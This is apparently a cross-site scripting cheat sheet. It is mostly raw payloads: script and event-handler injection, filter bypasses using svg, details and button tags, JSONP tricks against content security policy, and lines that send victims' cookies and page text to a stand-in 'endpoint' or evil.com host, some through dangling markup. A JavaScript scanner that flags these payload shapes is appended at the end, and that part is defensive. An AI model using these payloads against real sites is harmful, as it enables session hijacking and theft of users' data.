Executing code

XSS without filters

<script>alert()</script>

Bypassing filters on <script> tags

<img src="" onerror="alert()">
<body onload="alert()">

Stealing another user's cookies

<script>document.location.replace("http://endpoint?cookie="+document.cookie)</script>

Without redirecting:

<script>document.write('<img src="http://endpoint?cookie='+document.cookie+'">')</script>

Data exfiltration

Exfiltrating the current page's data

<script>document.location.replace("http://endpoint?data="+document.body.innerText)</script>

Dangling Markup:

<img src="http://endpoint?data=
<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=

Bypassing Chrome's restrictions:

<table background='//endpoint?data=

Using Ajax

<script>
    var getData = new XMLHttpRequest();
    getData.open("GET", "http://page-where-data-is", false);
    getData.send();
    var sendData = new XMLHttpRequest();
    sendData.open("GET", "http://endpoint?data="+getData.responseText, false);
    sendData.send();
</script>

Using JSONP endpoints to exploit CSP whitelists

<script src="http://jsonp-endpoint-which-is-in-whitelist?callback=alert()"></script>

Bypassing common filters

You can use the .concat() function instead of +

<script>document.location.replace("http://endpoint?cookie=".concat(document.cookie))</script>

Bypassing filters on the common tags <script>, <img>, <a>, <body>

<button onfocus="alert()" autofocus>
<details ontoggle="alert()" open>payload</details>
<svg><animate onbegin="alert()" attributeName=x dur=1s>
<svg><animate onend="alert()" attributeName=x dur=1s>
<svg><animate onrepeat="alert()" attributeName=x dur=1s repeatCount=2 />
<svg><set onbegin="alert()" attributename=x dur=1s>
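As an added example that is not part of the original cheat sheet, here is a small scanner that recognises the payload shapes collected on this page (script tags, on* event handlers on any tag including svg animate/set, meta refresh, the background= attribute and dangling markup) so they can be flagged in stored input, proxy logs or an application's test suite. Its finding labels are assumptions chosen for this example.

```javascript
// Added example, not part of the original cheat sheet: a scanner that walks the start
// tags of an HTML fragment and reports the payload shapes listed above (script tags,
// any on* event handler on any tag, meta refresh, the background= URL attribute and
// dangling markup, i.e. a quoted attribute value that never closes). A heuristic for
// log review and regression tests, not a sanitizer or a replacement for output encoding.
function scanHtml(html) {
  const findings = [];
  let i = 0;
  while (i < html.length) {
    const lt = html.indexOf('<', i);
    if (lt === -1) break;
    const m = /^<([a-zA-Z][\w:-]*)/.exec(html.slice(lt));
    if (!m) { i = lt + 1; continue; }              // end tag, comment or stray '<'
    const tag = m[1].toLowerCase();
    if (tag === 'script') findings.push('script-tag');
    let j = lt + m[0].length;
    while (j < html.length && html[j] !== '>') {    // attribute loop
      if (/[\s\/=]/.test(html[j])) { j++; continue; }
      const name = /^[^\s=>\/]+/.exec(html.slice(j))[0].toLowerCase();
      let k = j + name.length, value = '', dangling = false;
      while (/\s/.test(html[k] || '')) k++;
      if (html[k] === '=') {                        // optional value
        k++;
        while (/\s/.test(html[k] || '')) k++;
        const q = html[k];
        if (q === '"' || q === "'") {
          const end = html.indexOf(q, k + 1);
          if (end === -1) { dangling = true; k = html.length; }  // quote never closed
          else { value = html.slice(k + 1, end); k = end + 1; }
        } else {
          value = /^[^\s>]*/.exec(html.slice(k))[0];
          k += value.length;
        }
      }
      j = k;
      if (name.startsWith('on')) findings.push(`event-handler:${tag}[${name}]`);
      if (name === 'background') findings.push(`background-url:${tag}`);
      if (tag === 'meta' && name === 'http-equiv' && value.toLowerCase() === 'refresh') {
        findings.push('meta-refresh');
      }
      if (dangling) { findings.push(`dangling-markup:${tag}[${name}]`); return findings; }
    }
    i = j + 1;
  }
  return findings;
}
```

Because the scanner stops at the first unterminated quote, a dangling-markup finding also tells you which attribute would swallow the rest of the page.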